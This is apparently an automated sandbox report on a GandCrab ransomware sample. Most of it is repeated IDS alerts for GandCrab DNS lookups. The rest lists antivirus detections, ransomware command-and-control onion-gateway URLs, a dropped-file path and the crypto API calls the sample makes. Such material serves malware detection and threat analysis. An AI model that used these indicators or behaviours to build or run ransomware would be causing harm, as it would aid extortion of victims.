Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.858483532829500 09/01/22-00:03:29.383909
SID:	2829500
Source Port:	58483
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.856618532026737 09/01/22-00:02:49.105935
SID:	2026737
Source Port:	56618
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.855247532829498 09/01/22-00:03:03.466197
SID:	2829498
Source Port:	55247
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.861362532829498 09/01/22-00:03:28.520063
SID:	2829498
Source Port:	61362
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.861129532829498 09/01/22-00:03:15.922110
SID:	2829498
Source Port:	61129
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.857574532829498 09/01/22-00:01:53.251460
SID:	2829498
Source Port:	57574
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864597532829498 09/01/22-00:02:22.051454
SID:	2829498
Source Port:	64597
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.858303532026737 09/01/22-00:02:34.435886
SID:	2026737
Source Port:	58303
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.865387532026737 09/01/22-00:02:38.660218
SID:	2026737
Source Port:	65387
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853274532829498 09/01/22-00:02:55.325848
SID:	2829498
Source Port:	53274
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.851594532026737 09/01/22-00:03:26.907030
SID:	2026737
Source Port:	51594
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.863565532026737 09/01/22-00:02:17.049623
SID:	2026737
Source Port:	63565
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.850627532026737 09/01/22-00:03:18.737468
SID:	2026737
Source Port:	50627
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.858124532829498 09/01/22-00:02:27.993076
SID:	2829498
Source Port:	58124
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.850786532026737 09/01/22-00:02:43.346779
SID:	2026737
Source Port:	50786
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.850233532026737 09/01/22-00:02:54.805593
SID:	2026737
Source Port:	50233
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.854287532829500 09/01/22-00:03:33.736226
SID:	2829500
Source Port:	54287
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864605532829500 09/01/22-00:02:41.882665
SID:	2829500
Source Port:	64605
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864604532829500 09/01/22-00:02:41.862105
SID:	2829500
Source Port:	64604
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.855246532829498 09/01/22-00:03:03.448041
SID:	2829498
Source Port:	55246
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.855953532829500 09/01/22-00:03:25.594151
SID:	2829500
Source Port:	55953
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.858484532829500 09/01/22-00:03:29.402067
SID:	2829500
Source Port:	58484
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.857139532829498 09/01/22-00:01:34.235761
SID:	2829498
Source Port:	57139
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859435532026737 09/01/22-00:01:57.617695
SID:	2026737
Source Port:	59435
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.863564532026737 09/01/22-00:02:17.026690
SID:	2026737
Source Port:	63564
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.852958532829500 09/01/22-00:01:25.347118
SID:	2829500
Source Port:	52958
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860092532829500 09/01/22-00:02:16.532570
SID:	2829500
Source Port:	60092
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.863690532829498 09/01/22-00:03:21.664385
SID:	2829498
Source Port:	63690
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.858304532026737 09/01/22-00:02:34.463044
SID:	2026737
Source Port:	58304
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.855459532829498 09/01/22-00:03:07.276022
SID:	2829498
Source Port:	55459
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860476532829498 09/01/22-00:02:47.160135
SID:	2829498
Source Port:	60476
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.865110532829500 09/01/22-00:01:46.934130
SID:	2829500
Source Port:	65110
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.863449532829498 09/01/22-00:02:35.476503
SID:	2829498
Source Port:	63449
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.852960532829500 09/01/22-00:01:25.385522
SID:	2829500
Source Port:	52960
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.857390532829500 09/01/22-00:02:53.250639
SID:	2829500
Source Port:	57390
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.857573532829498 09/01/22-00:01:53.226527
SID:	2829498
Source Port:	57573
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.865514532829500 09/01/22-00:02:19.450712
SID:	2829500
Source Port:	65514
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.861131532829498 09/01/22-00:03:15.960645
SID:	2829498
Source Port:	61131
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.851141532829498 09/01/22-00:01:24.068248
SID:	2829498
Source Port:	51141
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853052532829498 09/01/22-00:02:15.036327
SID:	2829498
Source Port:	53052
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.861128532829498 09/01/22-00:03:15.903464
SID:	2829498
Source Port:	61128
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.852745532026737 09/01/22-00:03:24.040007
SID:	2026737
Source Port:	52745
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.854156532829498 09/01/22-00:02:39.730598
SID:	2829498
Source Port:	54156
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.857709532829500 09/01/22-00:01:42.750967
SID:	2829500
Source Port:	57709
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.861363532829498 09/01/22-00:03:28.538480
SID:	2829498
Source Port:	61363
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853308532829500 09/01/22-00:01:54.898418
SID:	2829500
Source Port:	53308
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860585532026737 09/01/22-00:01:27.503002
SID:	2026737
Source Port:	60585
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860771532829498 09/01/22-00:01:45.495695
SID:	2829498
Source Port:	60771
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860422532829498 09/01/22-00:03:32.403375
SID:	2829498
Source Port:	60422
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.850093532026737 09/01/22-00:03:38.699985
SID:	2026737
Source Port:	50093
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853041532026737 09/01/22-00:03:06.319112
SID:	2026737
Source Port:	53041
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.851994532026737 09/01/22-00:02:26.273853
SID:	2026737
Source Port:	51994
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.858917532829500 09/01/22-00:03:18.082512
SID:	2829500
Source Port:	58917
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864827532829500 09/01/22-00:02:24.792802
SID:	2829500
Source Port:	64827
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860820532829500 09/01/22-00:03:08.828384
SID:	2829500
Source Port:	60820
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.851997532026737 09/01/22-00:02:26.333413
SID:	2026737
Source Port:	51997
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.861188532829498 09/01/22-00:02:52.691629
SID:	2829498
Source Port:	61188
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859832532829500 09/01/22-00:02:56.017085
SID:	2829500
Source Port:	59832
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864600532829498 09/01/22-00:02:22.108885
SID:	2829498
Source Port:	64600
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.855640532829498 09/01/22-00:01:41.280696
SID:	2829498
Source Port:	55640
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.855462532829498 09/01/22-00:03:07.346617
SID:	2829498
Source Port:	55462
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859639532026737 09/01/22-00:01:39.951734
SID:	2026737
Source Port:	59639
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.855653532829498 09/01/22-00:03:19.277165
SID:	2829498
Source Port:	55653
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.857826532829500 09/01/22-00:03:22.956962
SID:	2829500
Source Port:	57826
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853847532829498 09/01/22-00:01:59.444336
SID:	2829498
Source Port:	53847
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.851108532829500 09/01/22-00:03:01.644612
SID:	2829500
Source Port:	51108
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.852459532026737 09/01/22-00:03:02.900983
SID:	2026737
Source Port:	52459
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864381532829500 09/01/22-00:03:20.034172
SID:	2829500
Source Port:	64381
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853626532026737 09/01/22-00:02:01.814516
SID:	2026737
Source Port:	53626
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859823532026737 09/01/22-00:02:19.973756
SID:	2026737
Source Port:	59823
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.851892532026737 09/01/22-00:03:31.996527
SID:	2026737
Source Port:	51892
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.856621532026737 09/01/22-00:02:49.211680
SID:	2026737
Source Port:	56621
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.855956532829500 09/01/22-00:03:25.650230
SID:	2829500
Source Port:	55956
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 9gkAKTWOXp.exe	Virustotal: Detection: 81%	Perma Link
Source: 9gkAKTWOXp.exe	Metadefender: Detection: 72%	Perma Link
Source: 9gkAKTWOXp.exe	ReversingLabs: Detection: 100%

Antivirus / Scanner detection for submitted sample

Source: 9gkAKTWOXp.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://gdcbghvjyqy7jclk.onion.casa/e644d32fec6144de	Avira URL Cloud: Label: malware
Source: http://gdcbghvjyqy7jclk.onion.top/e644d32fec6144de	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe

Avira: detection malicious, Label: TR/Crypt.XPACK.Gen3

Machine Learning detection for sample

Source: 9gkAKTWOXp.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe

Joe Sandbox ML: detected

Source: 13.0.vkspii.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen3
Source: 1.2.9gkAKTWOXp.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen3
Source: 13.2.vkspii.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen3
Source: 21.2.vkspii.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen3
Source: 1.0.9gkAKTWOXp.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen3
Source: 21.0.vkspii.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen3

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Code function: 1_2_00405750 VirtualAlloc,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenA,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,	1_2_00405750
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Code function: 1_2_00407C60 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	1_2_00407C60
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Code function: 1_2_00405D80 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,	1_2_00405D80
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Code function: 1_2_004048A0 Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,	1_2_004048A0
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Code function: 1_2_00407DB0 VirtualAlloc,CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	1_2_00407DB0
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Code function: 1_2_00405540 VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenW,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree,	1_2_00405540
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Code function: 1_2_00405050 lstrlenA,VirtualAlloc,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,VirtualAlloc,CryptStringToBinaryA,VirtualAlloc,MultiByteToWideChar,GetLastError,VirtualAlloc,VirtualFree,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,	1_2_00405050
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Code function: 1_2_00406000 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	1_2_00406000
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 13_2_004048A0 Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,	13_2_004048A0
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 13_2_00405540 VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenW,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree,	13_2_00405540
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 13_2_00405750 VirtualAlloc,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenA,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,	13_2_00405750
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 13_2_00405050 lstrlenA,VirtualAlloc,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,VirtualAlloc,CryptStringToBinaryA,VirtualAlloc,MultiByteToWideChar,GetLastError,VirtualAlloc,VirtualFree,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,	13_2_00405050
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 13_2_00407C60 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	13_2_00407C60
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 13_2_00406000 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	13_2_00406000
